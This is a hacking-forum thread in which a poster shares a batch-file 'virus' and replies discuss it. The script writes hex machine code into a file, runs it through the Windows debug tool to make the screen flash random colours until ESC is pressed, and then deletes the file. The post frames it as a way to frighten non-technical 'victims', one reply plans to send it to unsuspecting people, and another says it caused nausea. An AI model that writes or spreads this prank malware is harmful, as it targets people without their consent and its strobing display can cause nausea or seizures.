Hack Forums

Full Version: For all you batch lovers...
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3
I bring you the simple but annoying batch virus that makes the screen flash random colors.

OK to do this we need some help from windows debugger so here is the batch:
Code:
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\O.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\O.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\O.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\O.dbg
echo g=100>>\O.dbg
echo q>>\O.dbg
debug <\O.dbg>nul
del \O.dbg
Now if your victim has no idea about computers then this might be pretty scary for them. Feel free to use it in your batch file.

-[OXY]-
Press ESC to get rid of the flashing screen...
haha nice :D

i would have used that in my other batches if it wasnt so easy to close :(


but nice
its safe to run right ? cuz it has del command
its safe

tried it for 1 minute ago
lol, it is safe. and it looks cool.ill send this to few dumb people..
i tried it didnt work, probably cuz i got vista
No, doesn't work with vista lol.
i like it :)
i stared at it for a while and i think im gonna throw up
Pages: 1 2 3
Reference URL's